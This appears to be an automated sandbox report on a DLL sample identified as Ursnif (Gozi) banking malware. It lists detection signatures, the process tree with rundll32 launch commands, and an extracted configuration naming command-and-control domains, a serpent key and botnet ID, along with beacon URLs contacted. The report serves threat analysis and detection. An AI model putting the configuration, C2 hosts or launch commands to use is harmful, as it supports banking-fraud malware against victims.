Play interactive tour

Edit tour

Analysis Report shorefront.eps

Overview

General Information

Sample Name:	shorefront.eps (renamed file extension from eps to dll)
Analysis ID:	429225
MD5:	b3526bc3c4a61f9f09ac31ee9a5fc8a5
SHA1:	d92ac3fa9cca4ed8273111f767e24d8f53896787
SHA256:	f4a464c2e5f14cd4c391a9b5ba60deca36ccaa6c1503a097eeb0c5070945d1fb
Tags:	dllGozi
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Machine Learning detection for sample

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to detect virtual machines (STR)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

PE file contains an invalid checksum

Queries the installation date of Windows

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6604 cmdline: loaddll32.exe 'C:\Users\user\Desktop\shorefront.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6612 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6640 cmdline: rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6628 cmdline: rundll32.exe C:\Users\user\Desktop\shorefront.dll,Child MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6700 cmdline: rundll32.exe C:\Users\user\Desktop\shorefront.dll,Forcearea MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6720 cmdline: rundll32.exe C:\Users\user\Desktop\shorefront.dll,Stationmeat MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 816 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6476 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4136 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "YO4ItoAHj27nQHcek0ajLmmby9wzIPBRe+hTTGA+vdmBx9WHGSmH+27G6fUvU8FIdumcsGzdR3nVucsR89Hrym0hEi/6912U3fz8nLZTmfMNITP1haHrjk4931u8AJbwFobO2OROdhnUSaxTMA4bUUhDQ512s4Mw9dwF+RVgzByOOXZjTb/8c7RAb5TF3S9udlcSUcG0UgRjjerDAkFDNoGfvrRUbQdmhzdTQTVlAQndB1/gGmNmYRjiDY3ZPIgGCxRg+L7+cRtLwnqkaPMhiWWYFszaBPeJgqFJ28z3OWmw84N+FITvVekj/sQLKPQHnW1Axm22vEhQb3UNvpyJEVFYrda06XMVSGm1E2H2wkQ=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "4500", "server": "580", "serpent_key": "46uoXhSnsCfVUpSs", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.827452979.0000000000530000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.874866712.0000000002FE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.876330514.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.874909818.0000000002FE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.874494648.0000000002FE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.876188239.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.874791903.0000000002FE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.874837013.0000000002FE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.919920945.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.876373518.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.874942139.0000000002FE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000006.00000003.821591213.00000000030E0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.794830642.00000000027F0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.797710729.0000000002220000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000005.00000003.813086420.0000000003210000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.876356161.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.876088782.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.874588381.0000000002FE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.876229416.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.874885116.0000000002FE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.917892757.0000000002FE8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.876297207.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.876268229.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6640	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 6604	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author
5.3.rundll32.exe.3218d26.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.6c500000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.loaddll32.exe.538d26.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
6.3.rundll32.exe.30e8d26.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.rundll32.exe.2228d26.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.27f8d26.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.6c500000.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 2 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000003.827452979.0000000000530000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "YO4ItoAHj27nQHcek0ajLmmby9wzIPBRe+hTTGA+vdmBx9WHGSmH+27G6fUvU8FIdumcsGzdR3nVucsR89Hrym0hEi/6912U3fz8nLZTmfMNITP1haHrjk4931u8AJbwFobO2OROdhnUSaxTMA4bUUhDQ512s4Mw9dwF+RVgzByOOXZjTb/8c7RAb5TF3S9udlcSUcG0UgRjjerDAkFDNoGfvrRUbQdmhzdTQTVlAQndB1/gGmNmYRjiDY3ZPIgGCxRg+L7+cRtLwnqkaPMhiWWYFszaBPeJgqFJ28z3OWmw84N+FITvVekj/sQLKPQHnW1Axm22vEhQb3UNvpyJEVFYrda06XMVSGm1E2H2wkQ=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "4500", "server": "580", "serpent_key": "46uoXhSnsCfVUpSs", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for domain / URL

Show sources

Source: app.buboleinov.com

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: shorefront.dll	Virustotal: Detection: 46%			Perma Link
Source: shorefront.dll	ReversingLabs: Detection: 54%

Machine Learning detection for sample

Show sources

Source: shorefront.dll

Joe Sandbox ML: detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_005035A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		0_2_005035A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_047735A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		3_2_047735A1

Source: shorefront.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: shorefront.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\Original-shine\bat\Cat\page\Seven\Design.pdb source: loaddll32.exe, rundll32.exe, shorefront.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00504E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		0_2_00504E9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04774E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		3_2_04774E9C

Source: unknown

DNS traffic detected: queries for: app.buboleinov.com

Source: ~DF762A57E90D6A65CD.TMP.12.dr, {B147A470-C485-11EB-90EB-ECF4BBEA1588}.dat.12.dr	String found in binary or memory: http://app.buboleinov.com/7dGVcD7hOw3lYt5/1yqoO_2BT5cAFQCvp3/7fGu2bPOM/Y70HlHuovLn2gp_2B2GH/4_2FYxaP
Source: {B147A472-C485-11EB-90EB-ECF4BBEA1588}.dat.12.dr	String found in binary or memory: http://app.buboleinov.com/BHxjQVeA3bCRL3A0U_2Bhx/6Mf2XW6xM9nlO/OBBDiHLG/gVHcEz5iH6i5Er6PkMAnMWX/IOi2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.874866712.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876330514.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874909818.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874494648.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876188239.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874791903.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874837013.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.919920945.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876373518.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874942139.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876356161.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876088782.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874588381.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876229416.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874885116.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.917892757.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876297207.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876268229.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6640, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6604, type: MEMORY

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.827452979.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.821591213.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.794830642.00000000027F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.797710729.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.813086420.0000000003210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3218d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6c500000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.538d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.30e8d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2228d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.27f8d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6c500000.3.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.874866712.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876330514.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874909818.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874494648.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876188239.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874791903.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874837013.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.919920945.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876373518.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874942139.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876356161.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876088782.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874588381.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876229416.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874885116.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.917892757.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876297207.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876268229.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6640, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6604, type: MEMORY

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.827452979.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.821591213.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.794830642.00000000027F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.797710729.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.813086420.0000000003210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3218d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6c500000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.538d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.30e8d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2228d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.27f8d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6c500000.3.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_005035A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		0_2_005035A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_047735A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		3_2_047735A1

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C5018D1 GetProcAddress,NtCreateSection,memset,	0_2_6C5018D1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C501B89 NtMapViewOfSection,	0_2_6C501B89
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C502485 NtQueryVirtualMemory,	0_2_6C502485
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00503CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_00503CA1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_005081CD NtQueryVirtualMemory,	0_2_005081CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04773CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_04773CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_047781CD NtQueryVirtualMemory,	3_2_047781CD

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C502264	0_2_6C502264
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00506609	0_2_00506609
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00507FA8	0_2_00507FA8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C558C07	0_2_6C558C07
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C55A588	0_2_6C55A588
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C548ED8	0_2_6C548ED8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C54C8D4	0_2_6C54C8D4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C55139D	0_2_6C55139D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04776609	3_2_04776609
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04777FA8	3_2_04777FA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C558C07	3_2_6C558C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C55A588	3_2_6C55A588
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C548ED8	3_2_6C548ED8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C54C8D4	3_2_6C54C8D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C55139D	3_2_6C55139D

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6C54B330 appears 40 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C54B330 appears 40 times

Source: shorefront.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal92.troj.winDLL@16/17@6/0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_005019E7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_005019E7

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B147A46E-C485-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF896FBAE33087E32E.TMP

Jump to behavior

Source: shorefront.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\shorefront.dll,Child

Source: shorefront.dll	Virustotal: Detection: 46%
Source: shorefront.dll	ReversingLabs: Detection: 54%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\shorefront.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\shorefront.dll,Child
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\shorefront.dll,Forcearea
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\shorefront.dll,Stationmeat
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17414 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\shorefront.dll,Child	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\shorefront.dll,Forcearea	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\shorefront.dll,Stationmeat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17414 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79eac9d0-baf9-11ce-8c82-00aa004ba90b}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: shorefront.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: shorefront.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: c:\Original-shine\bat\Cat\page\Seven\Design.pdb source: loaddll32.exe, rundll32.exe, shorefront.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6C501F31 LoadLibraryA,GetProcAddress,

0_2_6C501F31

Source: shorefront.dll

Static PE information: real checksum: 0x6f44b should be: 0x6430b

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C502253 push ecx; ret	0_2_6C502263
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C502200 push ecx; ret	0_2_6C502209
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0050B67C push ss; retf	0_2_0050B690
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00507C20 push ecx; ret	0_2_00507C29
